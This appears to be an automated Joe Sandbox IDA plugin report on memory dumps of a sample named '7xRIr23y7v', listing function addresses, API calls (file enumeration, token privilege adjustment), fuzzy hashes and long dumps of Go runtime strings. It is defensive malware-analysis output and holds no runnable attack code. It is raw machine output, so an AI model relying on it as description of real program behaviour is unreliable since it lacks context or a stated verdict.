Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
String ID:
API String ID: 3044875250-0
Opcode ID: b4dadb2b0a0afafdc6fb41f1df9c6971b84a1ac73c104075e8593cd40dbcaad4
Instruction ID: 177b5dc906be4c03c583c89ae16c1a74922a85a5f3ef56a957e2314cf0bc1612
Opcode Fuzzy Hash: b4dadb2b0a0afafdc6fb41f1df9c6971b84a1ac73c104075e8593cd40dbcaad4
Instruction Fuzzy Hash: D1715372208A4AC2F762EB21F4543AD67B4FBC4B94F224135DA8D4B699DF38C6458702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73779C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA7377CB

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

_snprintf.LIBCMT ref: 0000017DEA7377E3

Part of subcall function 0000017DEA73B5DC: _errno.LIBCMT ref: 0000017DEA73B613
Part of subcall function 0000017DEA73B5DC: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73B61E

FindFirstFileA.KERNEL32 ref: 0000017DEA7377EE
free.LIBCMT ref: 0000017DEA7377FA

Part of subcall function 0000017DEA73B1E8: HeapFree.KERNEL32 ref: 0000017DEA73B1FE
Part of subcall function 0000017DEA73B1E8: _errno.LIBCMT ref: 0000017DEA73B208
Part of subcall function 0000017DEA73B1E8: GetLastError.KERNEL32 ref: 0000017DEA73B210

malloc.LIBCMT ref: 0000017DEA73784A
_snprintf.LIBCMT ref: 0000017DEA737862
free.LIBCMT ref: 0000017DEA73788A
FindNextFileA.KERNEL32 ref: 0000017DEA7378A3
FindClose.KERNEL32 ref: 0000017DEA7378B4

Strings

%s\*, xrefs: 0000017DEA7377D0

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
String ID: %s\*
API String ID: 2620626937-766152087
Opcode ID: 23b6a88991eaeecb41de4e49958cb864f07ba82b9ceb48e7eb1550cb5c125ff7
Instruction ID: 80f4e9a951d1a02480ff237ebdfd5c173075f365c6c572747b0703bcc03ee010
Opcode Fuzzy Hash: 23b6a88991eaeecb41de4e49958cb864f07ba82b9ceb48e7eb1550cb5c125ff7
Instruction Fuzzy Hash: 3B318B3120828B09EA57EB6238143F96B716BC6FE0F5945319EED0F796CE78D606C306

Uniqueness

Uniqueness Score: -1.00%

Function 007F51C0 Relevance: 16.9, Strings: 13, Instructions: 694COMMON

Download Yara Rule

Strings

@ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTH, xrefs: 007F5945
., xrefs: 007F58B4
gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid function symbol tableinvalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rang, xrefs: 007F5F36
+./0:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCS, xrefs: 007F5A96, 007F5C0E
MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_W, xrefs: 007F5D29
MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohs, xrefs: 007F5D07
failed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad , xrefs: 007F5F25
ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTypeIdeographicMedefai, xrefs: 007F5AC5
MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_Con, xrefs: 007F5D48
gcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not ArabicBrahmiCarian, xrefs: 007F5297, 007F52AD
MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoW, xrefs: 007F5D67
ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPalmyren, xrefs: 007F5C9C
(forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriti, xrefs: 007F5DA9

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriti$ @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTH$ MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoW$ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_W$ MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_Con$ MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohs$ ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTypeIdeographicMedefai$ ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPalmyren$+./0:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCS$.$failed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad $gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid function symbol tableinvalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rang$gcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not ArabicBrahmiCarian
API String ID: 0-22989015
Opcode ID: 226a9b26f831af5ff98ee5389df9d358d1d6cd75a2c6cbc1a3cd6d864e88e80c
Instruction ID: e3665838dc01d3bdaceb079784907c74434facba8745182563a09d0d36f7ad67
Opcode Fuzzy Hash: 226a9b26f831af5ff98ee5389df9d358d1d6cd75a2c6cbc1a3cd6d864e88e80c
Instruction Fuzzy Hash: 5C726A76208B8885EB10DF29F8813EA77A5F789B80F449126DACD93766DF7CC594CB01

Uniqueness

Uniqueness Score: -1.00%

Function 007EA5E0 Relevance: 15.4, Strings: 12, Instructions: 383COMMON

Download Yara Rule

Strings

, ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 007EAD05
out of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=span on userArena.faultList has invalid sizecannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validproduced a trigger greater than the he, xrefs: 007EA99F
, xrefs: 007EAC72
out of memory allocating allArenasruntime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceattempt to clear non-e, xrefs: 007EA98E
base outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanmin must be a non-zero power of 2misrounded allocation in sysAllocruntime: castogscanstatus oldval=runtime: failed mSpanList.ins, xrefs: 007EAC54
region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDelet, xrefs: 007EAC2A
out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre, xrefs: 007EA9C5
) not in usable address space: ...additional frames elided....lib section in a.out corruptedCentral Brazilian Standard TimeMountain Standard Time (Mexico)W. Central Africa Standard Timebad write barrier buffer boundscall from within the Go runtimecannot assig, xrefs: 007EAD25
runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeskip everything and stop the walkslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent loc, xrefs: 007EACE5
memory reservation exceeds address space limitpanicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h, xrefs: 007EAD4F
end outside usable address spaceinvalid limiter event type foundnumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedruntime: failed to release pagesrunt, xrefs: 007EAC82
arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer , xrefs: 007EA9B0

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: $) not in usable address space: ...additional frames elided....lib section in a.out corruptedCentral Brazilian Standard TimeMountain Standard Time (Mexico)W. Central Africa Standard Timebad write barrier buffer boundscall from within the Go runtimecannot assig$, ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer $base outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanmin must be a non-zero power of 2misrounded allocation in sysAllocruntime: castogscanstatus oldval=runtime: failed mSpanList.ins$end outside usable address spaceinvalid limiter event type foundnumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedruntime: failed to release pagesrunt$memory reservation exceeds address space limitpanicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc h$out of memory allocating allArenasruntime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceattempt to clear non-e$out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre$out of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=span on userArena.faultList has invalid sizecannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validproduced a trigger greater than the he$region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDelet$runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeskip everything and stop the walkslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent loc
API String ID: 0-4064386216
Opcode ID: 8b28befff7663a0f22fb1ac6902eb924c1bd553d12ce2ec9a1c6b9dfabce06ad
Instruction ID: 5be74fcf6427dbea3e3aa0061306dab4a116c0c605d387e7f3a19b7b5d005aa7
Opcode Fuzzy Hash: 8b28befff7663a0f22fb1ac6902eb924c1bd553d12ce2ec9a1c6b9dfabce06ad
Instruction Fuzzy Hash: C702797220ABC4D2DB608B16E4403AAB7A5F789B90F458222EFDD8379ADF3CD544C741

Uniqueness

Uniqueness Score: -1.00%

Function 007FF6E0 Relevance: 14.5, Strings: 11, Instructions: 725COMMON

Download Yara Rule

Strings

sweep increased allocation countuse of closed network connectionGODEBUG: no value specified for "InitializeProcThreadAttributeListbase outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack sp, xrefs: 008000AF
sweep: tried to preserve a user arena spanunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult, xrefs: 007FFF65
runtime: nelems=schedule: in cgotime: bad [0-9]*workbuf is empty spinningthreads=, p.searchAddr = : missing method DnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWLookupAccountSidWOld_North, xrefs: 00800025
previous allocCount=, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeEastern Standard TimeGetProfilesDirectoryWInscriptional_PahlaviLookupPrivilegeValueWMagadan , xrefs: 00800065
mspan.sweep: bad span state after sweepout of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWR, xrefs: 007FFFF8
swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMapp, xrefs: 007FFF76
mspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this dir, xrefs: 007FFF94, 00800365
mspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime:, xrefs: 008003DB
sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGOMEMLIMITGetIfEntryGetVersionGlagoliticKharoshthiLockFileExManichaeanOld_ItalicOld_Permic, xrefs: 007FFFB2, 00800385
mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetL, xrefs: 007FFFCF, 008003A5
nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagb, xrefs: 00800045

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetL$ nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagb$ previous allocCount=, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeEastern Standard TimeGetProfilesDirectoryWInscriptional_PahlaviLookupPrivilegeValueWMagadan $ sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGOMEMLIMITGetIfEntryGetVersionGlagoliticKharoshthiLockFileExManichaeanOld_ItalicOld_Permic$mspan.sweep: bad span state after sweepout of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWR$mspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime:$mspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this dir$runtime: nelems=schedule: in cgotime: bad [0-9]*workbuf is empty spinningthreads=, p.searchAddr = : missing method DnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWLookupAccountSidWOld_North$sweep increased allocation countuse of closed network connectionGODEBUG: no value specified for "InitializeProcThreadAttributeListbase outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack sp$sweep: tried to preserve a user arena spanunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult$swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMapp
API String ID: 0-2005612578
Opcode ID: d3e2b30c4159f8d0a4b831b54608eb120a9d30be40edae1033fd06f639cb0ff2
Instruction ID: 5a7287d3dbc85ad2d760f2203befa8cfb2cd4ece202fb6c8e6a1bb798b8eb68b
Opcode Fuzzy Hash: d3e2b30c4159f8d0a4b831b54608eb120a9d30be40edae1033fd06f639cb0ff2
Instruction Fuzzy Hash: 6162AE72208BD485DB61DB29E4403AEB7A5F785B84F458122EBCD83B96DF3CC995CB01

Uniqueness

Uniqueness Score: -1.00%

Function 008268A0 Relevance: 12.9, Strings: 10, Instructions: 371COMMON

Download Yara Rule

Strings

bad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremo, xrefs: 00826CCA, 00826E3B
runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.Locktraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompar, xrefs: 00826D06, 00826E74
runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot jobs done to unallocated spanArabic Standard TimeAzores Sta, xrefs: 00826C31, 00826DA9
(targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateF, xrefs: 00826C94, 00826E05
